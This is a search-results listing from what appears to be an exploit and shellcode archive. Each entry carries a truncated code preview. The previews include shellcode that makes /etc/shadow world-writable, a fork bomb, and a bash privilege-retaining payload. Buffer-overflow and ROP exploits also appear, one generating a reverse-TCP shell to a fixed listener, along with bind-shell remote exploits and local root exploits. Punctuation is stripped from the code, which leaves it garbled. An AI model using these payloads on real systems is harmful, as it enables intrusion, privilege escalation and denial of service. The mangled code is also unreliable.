7260 matches found
33 Bytes chmod("/etc/shadow", 0777) Shellcode
No description provided by source. [email protected] http://plasticsouptaste.blogspot.com Name: 33 bytes chmod"/etc/shadow", 0777 shellcode Platform: Linux x86 include "stdio.h" int mainint argc, char argv char shellcode...
Windows Mobile 6.5 TR (WinCE 5.2) MessageBox Shellcode (ARM)
No description provided by source...
SpongeBob SquarePants Typing Buffer Overflow (SEH)
No description provided by source. SEH overwrite exploit for SpongeBob SquarePants Typing from The Learning Company http://goo.gl/1EHaD Date: May 4th 2011 Author: Infant Overflow .-. - - || / \ | | | | | | | | / Fresh out the womb laying the smack down on SpongeBob I like my sploits like I like m...
FreeFloat FTP 1.0 - DEP Bypass with ROP
No description provided by source. !usr/bin/python Exploit title: FreeFloat ftp 1.0 DEP bypass with ROP Exploit Author: negux POC: http://www.exploit-db.com/exploits/24479/ Tested on : Windows XP SP 3 Spanish import socket,struct msfpayload windows/shellreversetcp LHOST=192.168.1.117 LPORT=443 R ...
MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass Exploit
No description provided by source. !/usr/bin/python +Exploit Title: MP3 CD Converter Professional Universal DEP Bypass Exploit +Date: 11\08\2011 +Author: C4SS!0 G0M3S +Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe +Version: 5.3.0 +Tested On: WIN-XP SP3 Brazilian Portuguese +CV...
AIX 3.x/4.x,Windows 95/98/2000/NT 4,SunOS 5 gethostbyname() Buffer Overflow
No description provided by source. source: http://www.securityfocus.com/bid/6853/info A vulnerability has been discovered in multiple vendor implementations of the 'gethostbyname' library function, which is used to resolve network addresses. The 'gethostbyname' function fails to implement...
29 bytes chmod("/etc/shadow", 0777) shellcode
No description provided by source. include stdio.h include string.h / by Magnefikko 20.04.2010 [email protected] promhyl.oz.pl Subgroup: PRekambr Name: 29 bytes chmod/etc/shadow, 0777 shellcode Platform: Linux x86 chmod/etc/shadow, 0777; gcc -Wl,-z,execstack filename.c shellcode:...
hztty 2.0 - Local root exploit (Tested on Red Hat 9.0)
No description provided by source. / 0x333hztty = hztty 2.0 local root exploit more info : Debian Security Advisory DSA 385-1 note I adjusted some part of hztty's code since there were some errors. hope this will not influence exploitation : tested against Red Hat 9.0 : c0wboy@0x333 c0wboy$ gcc...
Linux x86 forkbombe
No description provided by source. / Title: Linux x86 forkbombe - 6 bytes Author: Jonathan Salwan [email protected] Web: http://www.shell-storm.org ! Database of shellcodes: http://www.shell-storm.org/shellcode/ Disassembly of section .text: 08048054 a: 8048054: b0 02 mov $0x2,%al 8048056: c...
GNU Cfengine 2.-2.0.3 - Remote Stack Overflow Exploit
No description provided by source. !/usr/bin/perl -s kokaninATdtors.net / cfengine2-2.0.3 from freebsd ports 26/sep/2003. forking portbind shellcode port=0xb0ef45295 by eSDee bug discovered by nick cleaton, tested on FreeBSD 4.8-RELEASE use IO::Socket; if!$ARGV1 print usage: ./DSR-cfengine.pl hos...
Linux write() & exit(0) shellcode genearator with customizable text
No description provided by source. !/usr/bin/python Linux write & exit0 shellcode genearator with customizable text Usage: ./generator msg Author: Stoke Tested on: Ubuntu 8.10 E-mail: stoke95atyahoodotit Web: hack2web.altervista.org Visit: blasterhacking.forumcommunity.net import re, sys def...
Safari + Quicktime <= 7.3 RTSP Content-Type Remote BOF Exploit
No description provided by source. !/usr/bin/perl quickbite.pl Safari + Quicktime = 7.3 RTSP Content-Type overflow exploit for Mac OS X Intel Tested with OS X 10.4. On victim, browse to http://server:8080/ Binds shell on port 4444. by krafty greets to sk, halvar, grugq, and all the ethnical hacke...
Mac OS X <= 10.4.7 fetchmail Privilege Escalation Exploit (x86)
No description provided by source. !/usr/bin/perl getpwnedmail.pl http://www.digitalmunition.com written by kf kflistsatdigitalmunitiondotcom This is a canibalized version of Kansas City POP Daemon Version 0.0 - Copyright c 1999 David Nicol [email protected] kevin-finisterres-mac-mini:...
KNet Web Server 1.04b - Stack Corruption BoF
No description provided by source. !/usr/bin/perl KNet Web Server Stack corruption BoF PoC Written by Wireghoul - http://www.justanotherhacker.com Date: 2013/04/11 Version: 1.04b Tested on: WinXP SP3 use IO::Socket::INET; $host = shift; $port = shift; print KNet Web Server stack corruption BoF Po...
Easy File Management Web Server v5.3 - UserID Remote Buffer Overflow (ROP)
No description provided by source. !/usr/bin/python Exploit Title: Easy File Management Web Server v5.3 - USERID Remote Buffer Overflow ROP Version: 5.3 Date: 2014-05-31 Author: Julien Ahrens @MrTuxracer Homepage: http://www.rcesecurity.com Software Link: http://www.efssoft.com/ Tested on:...
AtomixMP3 <= 2.3 - (.M3U) Buffer Overflow Exploit
No description provided by source. / ======================================================================== 0-day AtomixMP3 = v2.3 Malformed M3U Buffer Overflow PoC ======================================================================== AtomixMP3 Player/Mixer fails to properly handle large fil...
BNC 2.2.4/2.4.6/2.4.8 IRC Proxy Buffer Overflow Vulnerability (1)
No description provided by source. / source: http://www.securityfocus.com/bid/1927/info BNC's IRC Proxy is used as a gateway to an IRC server. A buffer stores a username which arguments the program's USER command. User-supplied input to this buffer is improperly checked for length. As a result, t...
linux/x86 sends "Phuck3d!" to all terminals (60 bytes) shellcode
No description provided by source. / $Id: where-is-wallie.c, v 1.0 2010/04/24 18:32:29 condis Exp $ linux/x86 sends Phuck3d! to all terminals 60 bytes shellcode by condis Tested on: Linux Debian / int mainvoid char evil = \x6a\x0b // push $0xb \x58 // pop %eax \x99 // cltd \x52 // push %edx...
Serv-U 4.x "site chmod" Remote Buffer Overflow Exploit
No description provided by source. include stdio.h include sys/types.h include sys/socket.h include netinet/in.h define exploitlength 511 define NOP 'A' define SEHhandleroffset 400 char SEHhandler = \x41\x41\xEB\x04; // 3 jmp over next four bytes char retaddress4004 = \xab\x1c\x5f\x01; // 1...
Linux x86 - execve("/bin/bash","-p",NULL) - 33 bytes
No description provided by source. / Title: Linux x86 - execve/bin/bash, /bin/bash, -p, NULL - 33 bytes Author: Jonathan Salwan Mail: [email protected] Web: http://www.shell-storm.org !Database of Shellcodes http://www.shell-storm.org/shellcode/ sh sets euid, egid to uid, gid if -p not...